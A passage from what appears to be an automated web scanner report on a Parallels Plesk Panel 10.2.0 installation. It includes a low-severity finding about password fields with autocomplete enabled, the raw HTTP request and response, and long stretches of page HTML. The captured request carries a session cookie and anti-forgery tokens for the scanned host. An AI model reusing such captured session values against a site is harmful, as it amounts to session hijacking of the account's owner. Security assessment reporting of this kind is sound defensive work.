<option value="RW" label="Rwanda">Rwanda</option>
<option value="BL" label="Saint Barthelemy">Saint Barthelemy</option>
<option value="SH" label="Saint Helena, Ascension and Tristan da Cunha">Saint Helena, Ascension and Tristan da Cunha</option>
<option value="KN" label="Saint Kitts and Nevis">Saint Kitts and Nevis</option>
<option value="LC" label="Saint Lucia">Saint Lucia</option>
<option value="MF" label="Saint Martin">Saint Martin</option>
<option value="PM" label="Saint Pierre and Miquelon">Saint Pierre and Miquelon</option>
<option value="VC" label="Saint Vincent and the Grenadines">Saint Vincent and the Grenadines</option>
<option value="WS" label="Samoa">Samoa</option>
<option value="SM" label="San Marino">San Marino</option>
<option value="ST" label="Sao Tome and Principe">Sao Tome and Principe</option>
<option value="SA" label="Saudi Arabia">Saudi Arabia</option>
<option value="SN" label="Senegal">Senegal</option>
<option value="RS" label="Serbia">Serbia</option>
<option value="SC" label="Seychelles">Seychelles</option>
<option value="SL" label="Sierra Leone">Sierra Leone</option>
<option value="SG" label="Singapore">Singapore</option>
<option value="SK" label="Slovakia">Slovakia</option>
<option value="SI" label="Slovenia">Slovenia</option>
<option value="SB" label="Solomon Islands">Solomon Islands</option>
<option value="SO" label="Somalia">Somalia</option>
<option value="ZA" label="South Africa">South Africa</option>
<option value="GS" label="South Georgia and the South Sandwich Islands">South Georgia and the South Sandwich Islands</option>
<option value="ES" label="Spain">Spain</option>
<option value="LK" label="Sri Lanka">Sri Lanka</option>
<option value="SD" label="Sudan">Sudan</option>
<option value="SR" label="Suriname">Suriname</option>
<option value="SJ" label="Svalbard and Jan Mayen">Svalbard and Jan Mayen</option>
<option value="SZ" label="Swaziland">Swaziland</option>
<option value="SE" label="Sweden">Sweden</option>
<option value="CH" label="Switzerland">Switzerland</option>
<option value="SY" label="Syrian Arab Republic">Syrian Arab Republic</option>
<option value="TW" label="Taiwan">Taiwan</option>
<option value="TJ" label="Tajikistan">Tajikistan</option>
<option value="TZ" label="Tanzania, United Republic of">Tanzania, United Republic of</option>
<option value="TH" label="Thailand">Thailand</option>
<option value="TL" label="Timor-Leste">Timor-Leste</option>
<option value="TG" label="Togo">Togo</option>
<option value="TK" label="Tokelau">Tokelau</option>
<option value="TO" label="Tonga">Tonga</option>
<option value="TT" label="Trinidad and Tobago">Trinidad and Tobago</option>
<option value="TN" label="Tunisia">Tunisia</option>
<option value="TR" label="Turkey">Turkey</option>
<option value="TM" label="Turkmenistan">Turkmenistan</option>
<option value="TC" label="Turks and Caicos Islands">Turks and Caicos Islands</option>
<option value="TV" label="Tuvalu">Tuvalu</option>
<option value="UG" label="Uganda">Uganda</option>
<option value="UA" label="Ukraine">Ukraine</option>
<option value="AE" label="United Arab Emirates">United Arab Emirates</option>
<option value="GB" label="United Kingdom">United Kingdom</option>
<option value="US" label="United States" selected="selected">United States</option>
<option value="UM" label="United States Minor Outlying Islands">United States Minor Outlying Islands</option>
<option value="UY" label="Uruguay">Uruguay</option>
<option value="UZ" label="Uzbekistan">Uzbekistan</option>
<option value="VU" label="Vanuatu">Vanuatu</option>
<option value="VE" label="Venezuela, Bolivarian Republic of">Venezuela, Bolivarian Republic of</option>
<option value="VN" label="Viet Nam">Viet Nam</option>
<option value="VG" label="Virgin Islands, British">Virgin Islands, British</option>
<option value="VI" label="Virgin Islands, U.S.">Virgin Islands, U.S.</option>
<option value="WF" label="Wallis and Futuna">Wallis and Futuna</option>
<option value="EH" label="Western Sahara">Western Sahara</option>
<option value="YE" label="Yemen">Yemen</option>
<option value="ZM" label="Zambia">Zambia</option>
<option value="ZW" label="Zimbabwe">Zimbabwe</option>
</select>
<span class='field-errors' style="display:none;"></span>

</div>
</div></div>
</div>
<script type='text/javascript'>
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Panel({
title: '',
applyTo: 'contacts-contactsSection'
});
});
//]]>
</script>
</div>

<div class="btns-box">
<div class="box-area">
<div class="form-row">
<div class="field-name">
<span class="required">*</span>
Required fields </div>
<div class="field-value">

<span id='btn-send' class='btn'></span>
<script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.CommandButton({
applyTo: 'btn-send',
title: 'OK',
cls: 'btn',
name: 'send',
value: '',
description: '',
disabled: false,
handler: function(event) { Jsw.submit(this); }
});
});
</script>

<span id='btn-cancel' class='btn'></span>
<script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.CommandButton({
applyTo: 'btn-cancel',
title: 'Cancel',
cls: 'btn',
name: 'cancel',
value: '',
description: '',
disabled: false,
handler: function(event) { Jsw.redirect("/user/list"); }
});
});
</script>

<input type="hidden" name="hidden" value="" id="hidden" />
<!-- ability to submit form via Enter -->
<input type="image" src="/skins/default/img/blank.gif" style="border: 0; height: 0; width: 0; position: absolute;" />
</div>
</div>
</div>
</div>

<input type="hidden" name="forgery_protection_token" value="bdaafe67daaa200e2f077bd9577b09f4" id="form_forgery_protection_token" /></form>
<script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.FormAjax({
applyTo: 'form-user',
waitButtonTitle: 'Please wait'
})
});
</script>

</div> <!-- /main -->


</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

6.8. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/user/edit/id/4

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /smb/user/edit/id/4

Issue detail

The page contains a form with the following action URL:

The form contains the following password fields with autocomplete enabled:

Request

GET /smb/user/edit/id/4 HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Proxy-Connection: keep-alive
Referer: http://www.nosedivesailing.com:8880/smb/user/list
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PLESKSESSID=17161f28b87a6960fb097d11330c9c53; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 18:29:11 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 18:29:11 GMT
Connection: close
Content-Length: 45522

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="3e86204e9517123c7f585d736d64aa3f" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<title>format-1 - Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/user/action-name/edit" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Fuser%2Fedit%2Fid%2F4' + '&activeModule=' + 'users' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"active","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>

<div class="heading no-border">
<div class="heading-area">
<div class="toolbar">
<span id="toolbar-content"></span>
<a class="s-btn sb-uplevel" href="/smb/user/list">
<span>Up Level</span>
</a>
</div>
<h2><span><b>format-1</b></span></h2>
</div>
</div>


<div class="msg-box msg-error"><div><div><div><div><div>
<div class="msg-content">
<span class="title">Error:</span> Invalid URL was requested. </div>
</div></div></div></div></div></div>


<div id="content-body" class="clearfix">
<div id="main">

<script type="text/javascript">
//<![CDATA[
Smb.UserEditForm = Class.create({

initialize: function(config) {

if (!$('general-account-loginString')) {
return;
}

if ($('general-vcard-email-emailType-internal')) {
$('general-vcard-email-emailType-internal').observe('click', this._generateLogin.bind(this));
}
if ($('general-vcard-email-internalEmail')) {
$('general-vcard-email-internalEmail').observe('keyup', this._generateLogin.bind(this));
$('general-vcard-email-internalEmail').observe('change', this._generateLogin.bind(this));
}
if ($('general-vcard-email-domain')) {
$('general-vcard-email-domain').observe('change', this._generateLogin.bind(this));
}

if ($('general-vcard-email-emailType-external')) {
$('general-vcard-email-emailType-external').observe('click', this._generateLogin.bind(this));
}
if ($('general-vcard-email-externalEmail')) {
$('general-vcard-email-externalEmail').observe('keyup', this._generateLogin.bind(this));
$('general-vcard-email-externalEmail').observe('change', this._generateLogin.bind(this));
}
},

_generateLogin: function() {
if ($('general-vcard-email-emailType-internal') && $('general-vcard-email-emailType-internal').checked) {
var loginString = $('general-vcard-email-internalEmail').value;
if ('' == loginString) {
//empty username
} else
if ($('general-vcard-email-domain')) {
loginString += '@' + $('general-vcard-email-domain').options[$('general-vcard-email-domain').selectedIndex].text;
} else {
loginString += '@' + $('general-vcard-email-internalEmail-domain').innerHTML;
}
$('general-account-loginString').update(loginString);
} else if ($('general-vcard-email-emailType-external') && $('general-vcard-email-emailType-external').checked) {
var loginString = $('general-vcard-email-externalEmail').value;
$('general-account-loginString').update(loginString);
} else if ($('general-vcard-email-externalEmail')) {
var loginString = $('general-vcard-email-externalEmail').value;
$('general-account-loginString').update(loginString);
}
}
});

Jsw.onReady(function() {
new Smb.UserEditForm();
});
//]]>
</script><form id="form-user" enctype="application/x-www-form-urlencoded" action="" method="post"><div id='form-tab-buttons' class='tabs'></div><script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.bar.Tabs({
type: 'dynamic',
applyTo: 'form-tab-buttons',
items: [{"componentType":"Jsw.bar.Button","title":"General","tabId":"tab-general","containerCls":"active"},{"componentType":"Jsw.bar.Button","title":"Contact Details","tabId":"tab-contacts","containerCls":""}]
});
});
</script>

<div id='tab-general' >

<div id='general-vcard' class='form-box' >
<div id='general-vcard-content-area'>
<div id='general-vcard-contactName-form-row' class='form-row' >
<div class='field-name'><label for='general-vcard-contactName'>Contact name&nbsp;<span class="required">*</span></label></div>
<div class='field-value'>

<input type="text" name="general[vcard][contactName]" id="general-vcard-contactName" value="format-1" class="f-middle-size input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div class="form-row">
<div class='field-name'>
<label for='general-vcard-email-emailType'>E-mail address which is also used as a username for logging in to the Panel&nbsp;</label> <span class="required">*</span>
</div>
<div class="field-value">
<div class="text-value">
<div class="indent-box">

<span><input type="radio" class="radio"
value="internal"
id="general-vcard-email-emailType-internal"
name="general[vcard][email][emailType]"
checked="checked" /></span>

<div class="indent-box-content">
<label for="general-vcard-email-emailType-internal">Create an e-mail address under your account</label>
<div class='form-row'>
<div>
<input type="text" name="general[vcard][email][internalEmail]" id="general-vcard-email-internalEmail" value="fdf080d9224fd0d18957a62c" class="input-text" /> @<span id='general-vcard-email-internalEmail-domain'>vulnerable.host.fqdn</span></div>
<span class='field-errors'>
</span>
</div>
</div>

</div>
<div class="indent-box">

<span><input type="radio" class="radio"
value="external"
id="general-vcard-email-emailType-external"
name="general[vcard][email][emailType]"
/></span>

<div class="indent-box-content">
<label for="general-vcard-email-emailType-external">Use an external e-mail address</label>
<div class='form-row'>
<div>
<input type="text" name="general[vcard][email][externalEmail]" id="general-vcard-email-externalEmail" value="fdf080d9224fd0d18957a62c@nosedivesailing.com" class="f-middle-size input-text" disabled="1" /></div>
<span class='field-errors'>
</span>
</div>
</div>

</div>
</div>
</div>
</div>

<script type="text/javascript">
//<![CDATA[
Smb.UserEmailForm = Class.create({

initialize: function(config) {
this._prefix = config['prefix'];
this._internalEmailId = this._prefix + config['internalEmailId'];
this._internalEmailElements = config['internalEmailElements'];
this._externalEmailId = this._prefix + config['externalEmailId'];
this._externalEmailElements = config['externalEmailElements'];
$(this._internalEmailId).observe('click', this._internalEmailOnClick.bind(this));
$(this._externalEmailId).observe('click', this._externalEmailOnClick.bind(this));
if ($(this._internalEmailId).checked) {
this._internalEmailOnClick();
} else {
   this._externalEmailOnClick();
}
},

_internalEmailOnClick: function() {
this._externalEmailElements.each(function(elementId) {
$(this._prefix + elementId).disable();
}, this);
this._internalEmailElements.each(function(elementId) {
$(this._prefix + elementId).enable();
}, this);
},

_externalEmailOnClick: function() {
this._internalEmailElements.each(function(elementId) {
$(this._prefix + elementId).disable();
}, this);
this._externalEmailElements.each(function(elementId) {
$(this._prefix + elementId).enable();
}, this);
}
});

Jsw.onReady(function() {
new Smb.UserEmailForm({
prefix: 'general-vcard-email-',
internalEmailId: 'emailType-internal',
internalEmailElements: ['internalEmail'
],
externalEmailId: 'emailType-external',
externalEmailElements: ['externalEmail']
});

});
//]]>
</script>


<div id='general-vcard-roleId-form-row' class='form-row' >
<div class='field-name'><label for='general-vcard-roleId'>User role&nbsp;</label></div>
<div class='field-value'>

<select name="general[vcard][roleId]" id="general-vcard-roleId">
<option value="5" label="Owner">Owner</option>
<option value="6" label="WebMaster">WebMaster</option>
<option value="7" label="Application User" selected="selected">Application User</option>
<option value="8" label="Accountant">Accountant</option>
</select>
<span class='field-errors' style="display:none;"></span>
<span class="hint">User roles grant users administrative privileges and access to applications that you selected for the role.</span>
</div>
</div></div>
</div>
<script type='text/javascript'>
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Panel({
title: 'General Information',
applyTo: 'general-vcard'
});
});
//]]>
</script>


<div id='general-account' class='form-box' >
<div id='general-account-content-area'>

<div class='form-row'>
<div class='field-name'><label for='general-account-loginString'>Username&nbsp;</label></div>
<div class='field-value'>
<div class='text-value'>
<span id='general-account-loginString'>fdf080d9224fd0d18957a62c@vulnerable.host.fqdn</span>

</div>
</div>
</div>
<div id='general-account-password-form-row' class='form-row' >
<div class='field-name'><label for='general-account-password'>Password&nbsp;</label></div>
<div class='field-value'>

<input type="password" name="general[account][password]" id="general-account-password" value="" class="input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div><script type='text/javascript'>
Jsw.onReady(function() {
var pswd = $('general-account-password');
new Jsw.PasswordMeter({
renderTo: 'general-account-password',
renderMode: 'after',
observe: 'general-account-password',
locale: {"title":"Password Strength","description":"To improve your password: ","passwordTooShort":"Make the password longer.","lettersLowerCase":"Use at least one lower-case character.","lettersUpperCase":"Use at least one upper-case character.","numbers1":"Use at least one number.","numbers3":"Use at least three numbers.","specialChar1":"Use at least one special character (for example: !, @, #, $, % ,^, &, *, ?, _, ~).","specialChar2":"Use at least two special characters (for example: !, @, #, $, %, ^, &, *, ?, _, ~).","comboUpperAndLower":"Use both upper and lower-case characters.","comboLettersAndNumbers":"Use both numbers and characters.","comboLettersNumbersSpecial":"Use numbers, characters and special characters.","yourPasswordIsStrong":"Your password is strong, but you can make it even stronger by increasing its length.","verdictNone":"Very weak","verdictVeryWeak":"Very weak","verdictWeak":"Weak","verdictMediocre":"Medium","verdictStrong":"Strong","verdictStronger":"Very strong"}
}).render();
});</script>
<div id='general-account-passwordConfirmation-form-row' class='form-row' >
<div class='field-name'><label for='general-account-passwordConfirmation'>Confirm password&nbsp;</label></div>
<div class='field-value'>

<input type="password" name="general[account][passwordConfirmation]" id="general-account-passwordConfirmation" value="" class="input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>

<div class='form-row'>
<div class='single-row'>
<div class='indent-box'>

<input type="hidden" name="general[account][isActive]" value="0" /><input type="checkbox" name="general[account][isActive]" id="general-account-isActive" value="1" checked="checked" class="checkbox" />
<div class='indent-box-content'>
<label for='general-account-isActive'>User is active&nbsp;</label>
<span class="hint">Active users can access the Panel.</span>
</div>
</div>
</div>
</div></div>
</div>
<script type='text/javascript'>
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Panel({
title: 'Panel Preferences',
applyTo: 'general-account'
});
});
//]]>
</script>
</div>
<div id='tab-contacts' style="display: none;">

<div id='contacts-contactsSection' class='form-box' >
<div id='contacts-contactsSection-content-area'>
<div id='contacts-contactsSection-companyName-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-companyName'>Company name&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="contacts[contactsSection][companyName]" id="contacts-contactsSection-companyName" value="" class="f-middle-size input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-phone-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-phone'>Phone number&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="contacts[contactsSection][phone]" id="contacts-contactsSection-phone" value="" class="f-middle-size input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-fax-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-fax'>Fax number&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="contacts[contactsSection][fax]" id="contacts-contactsSection-fax" value="" class="f-middle-size input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-address-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-address'>Address&nbsp;</label></div>
<div class='field-value'>

<textarea name="contacts[contactsSection][address]" id="contacts-contactsSection-address" class="f-middle-size" rows="4" cols="80"></textarea>
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-city-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-city'>City&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="contacts[contactsSection][city]" id="contacts-contactsSection-city" value="" class="f-middle-size input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-state-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-state'>State or province&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="contacts[contactsSection][state]" id="contacts-contactsSection-state" value="" class="input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-zip-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-zip'>Postal or ZIP code&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="contacts[contactsSection][zip]" id="contacts-contactsSection-zip" value="" class="input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-country-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-country'>Country&nbsp;</label></div>
<div class='field-value'>

<select name="contacts[contactsSection][country]" id="contacts-contactsSection-country">
<option value="AF" label="Afghanistan">Afghanistan</option>
<option value="AX" label="Åland Islands">Åland Islands</option>
<option value="AL" label="Albania">Albania</option>
<option value="DZ" label="Algeria">Algeria</option>
<option value="AS" label="American Samoa">American Samoa</option>
<option value="AD" label="Andorra">Andorra</option>
<option value="AO" label="Angola">Angola</option>
<option value="AI" label="Anguilla">Anguilla</option>
<option value="AQ" label="Antarctica">Antarctica</option>
<option value="AG" label="Antigua and Barbuda">Antigua and Barbuda</option>
<option value="AR" label="Argentina">Argentina</option>
<option value="AM" label="Armenia">Armenia</option>
<option value="AW" label="Aruba">Aruba</option>
<option value="AU" label="Australia">Australia</option>
<option value="AT" label="Austria">Austria</option>
<option value="AZ" label="Azerbaijan">Azerbaijan</option>
<option value="BS" label="Bahamas">Bahamas</option>
<option value="BH" label="Bahrain">Bahrain</option>
<option value="BD" label="Bangladesh">Bangladesh</option>
<option value="BB" label="Barbados">Barbados</option>
<option value="BY" label="Belarus">Belarus</option>
<option value="BE" label="Belgium">Belgium</option>
<option value="BZ" label="Belize">Belize</option>
<option value="BJ" label="Benin">Benin</option>
<option value="BM" label="Bermuda">Bermuda</option>
<option value="BT" label="Bhutan">Bhutan</option>
<option value="BO" label="Bolivia, Plurinational State of">Bolivia, Plurinational State of</option>
<option value="BA" label="Bosnia and Herzegovina">Bosnia and Herzegovina</option>
<option value="BW" label="Botswana">Botswana</option>
<option value="BV" label="Bouvet Island">Bouvet Island</option>
<option value="BR" label="Brazil">Brazil</option>
<option value="IO" label="British Indian Ocean Territory">British Indian Ocean Territory</option>
<option value="BN" label="Brunei Darussalam">Brunei Darussalam</option>
<option value="BG" label="Bulgaria">Bulgaria</option>
<option value="BF" label="Burkina Faso">Burkina Faso</option>
<option value="BI" label="Burundi">Burundi</option>
<option value="KH" label="Cambodia">Cambodia</option>
<option value="CM" label="Cameroon">Cameroon</option>
<option value="CA" label="Canada">Canada</option>
<option value="CV" label="Cape Verde">Cape Verde</option>
<option value="KY" label="Cayman Islands">Cayman Islands</option>
<option value="CF" label="Central African Republic">Central African Republic</option>
<option value="TD" label="Chad">Chad</option>
<option value="CL" label="Chile">Chile</option>
<option value="CN" label="China">China</option>
<option value="CX" label="Christmas Island">Christmas Island</option>
<option value="CC" label="Cocos (Keeling) Islands">Cocos (Keeling) Islands</option>
<option value="CO" label="Colombia">Colombia</option>
<option value="KM" label="Comoros">Comoros</option>
<option value="CG" label="Congo">Congo</option>
<option value="CD" label="Congo, the Democratic Republic of the">Congo, the Democratic Republic of the</option>
<option value="CK" label="Cook Islands">Cook Islands</option>
<option value="CR" label="Costa Rica">Costa Rica</option>
<option value="CI" label="Cote D'Ivoire">Cote D'Ivoire</option>
<option value="HR" label="Croatia">Croatia</option>
<option value="CU" label="Cuba">Cuba</option>
<option value="CY" label="Cyprus">Cyprus</option>
<option value="CZ" label="Czech Republic">Czech Republic</option>
<option value="DK" label="Denmark">Denmark</option>
<option value="DJ" label="Djibouti">Djibouti</option>
<option value="DM" label="Dominica">Dominica</option>
<option value="DO" label="Dominican Republic">Dominican Republic</option>
<option value="EC" label="Ecuador">Ecuador</option>
<option value="EG" label="Egypt">Egypt</option>
<option value="SV" label="El Salvador">El Salvador</option>
<option value="GQ" label="Equatorial Guinea">Equatorial Guinea</option>
<option value="ER" label="Eritrea">Eritrea</option>
<option value="EE" label="Estonia">Estonia</option>
<option value="ET" label="Ethiopia">Ethiopia</option>
<option value="FK" label="Falkland Islands (Malvinas)">Falkland Islands (Malvinas)</option>
<option value="FO" label="Faroe Islands">Faroe Islands</option>
<option value="FJ" label="Fiji">Fiji</option>
<option value="FI" label="Finland">Finland</option>
<option value="FR" label="France">France</option>
<option value="GF" label="French Guiana">French Guiana</option>
<option value="PF" label="French Polynesia">French Polynesia</option>
<option value="TF" label="French Southern Territories">French Southern Territories</option>
<option value="GA" label="Gabon">Gabon</option>
<option value="GM" label="Gambia">Gambia</option>
<option value="GE" label="Georgia">Georgia</option>
<option value="DE" label="Germany">Germany</option>
<option value="GH" label="Ghana">Ghana</option>
<option value="GI" label="Gibraltar">Gibraltar</option>
<option value="GR" label="Greece">Greece</option>
<option value="GL" label="Greenland">Greenland</option>
<option value="GD" label="Grenada">Grenada</option>
<option value="GP" label="Guadeloupe">Guadeloupe</option>
<option value="GU" label="Guam">Guam</option>
<option value="GT" label="Guatemala">Guatemala</option>
<option value="GG" label="Guernsey">Guernsey</option>
<option value="GN" label="Guinea">Guinea</option>
<option value="GW" label="Guinea-Bissau">Guinea-Bissau</option>
<option value="GY" label="Guyana">Guyana</option>
<option value="HT" label="Haiti">Haiti</option>
<option value="HM" label="Heard Island and McDonald Islands">Heard Island and McDonald Islands</option>
<option value="VA" label="Holy See (Vatican City State)">Holy See (Vatican City State)</option>
<option value="HN" label="Honduras">Honduras</option>
<option value="HK" label="Hong Kong">Hong Kong</option>
<option value="HU" label="Hungary">Hungary</option>
<option value="IS" label="Iceland">Iceland</option>
<option value="IN" label="India">India</option>
<option value="ID" label="Indonesia">Indonesia</option>
<option value="IR" label="Iran, Islamic Republic of">Iran, Islamic Republic of</option>
<option value="IQ" label="Iraq">Iraq</option>
<option value="IE" label="Ireland">Ireland</option>
<option value="IM" label="Isle of Man">Isle of Man</option>
<option value="IL" label="Israel">Israel</option>
<option value="IT" label="Italy">Italy</option>
<option value="JM" label="Jamaica">Jamaica</option>
<option value="JP" label="Japan">Japan</option>
<option value="JE" label="Jersey">Jersey</option>
<option value="JO" label="Jordan">Jordan</option>
<option value="KZ" label="Kazakhstan">Kazakhstan</option>
<option value="KE" label="Kenya">Kenya</option>
<option value="KI" label="Kiribati">Kiribati</option>
<option value="KP" label="Korea, Democratic People's Republic of">Korea, Democratic People's Republic of</option>
<option value="KR" label="Korea, Republic of">Korea, Republic of</option>
<option value="KW" label="Kuwait">Kuwait</option>
<option value="KG" label="Kyrgyzstan">Kyrgyzstan</option>
<option value="LA" label="Lao People's Democratic Republic">Lao People's Democratic Republic</option>
<option value="LV" label="Latvia">Latvia</option>
<option value="LB" label="Lebanon">Lebanon</option>
<option value="LS" label="Lesotho">Lesotho</option>
<option value="LR" label="Liberia">Liberia</option>
<option value="LY" label="Libyan Arab Jamahiriya">Libyan Arab Jamahiriya</option>
<option value="LI" label="Liechtenstein">Liechtenstein</option>
<option value="LT" label="Lithuania">Lithuania</option>
<option value="LU" label="Luxembourg">Luxembourg</option>
<option value="MO" label="Macao">Macao</option>
<option value="MK" label="Macedonia, the Former Yugoslav Republic of">Macedonia, the Former Yugoslav Republic of</option>
<option value="MG" label="Madagascar">Madagascar</option>
<option value="MW" label="Malawi">Malawi</option>
<option value="MY" label="Malaysia">Malaysia</option>
<option value="MV" label="Maldives">Maldives</option>
<option value="ML" label="Mali">Mali</option>
<option value="MT" label="Malta">Malta</option>
<option value="MH" label="Marshall Islands">Marshall Islands</option>
<option value="MQ" label="Martinique">Martinique</option>
<option value="MR" label="Mauritania">Mauritania</option>
<option value="MU" label="Mauritius">Mauritius</option>
<option value="YT" label="Mayotte">Mayotte</option>
<option value="MX" label="Mexico">Mexico</option>
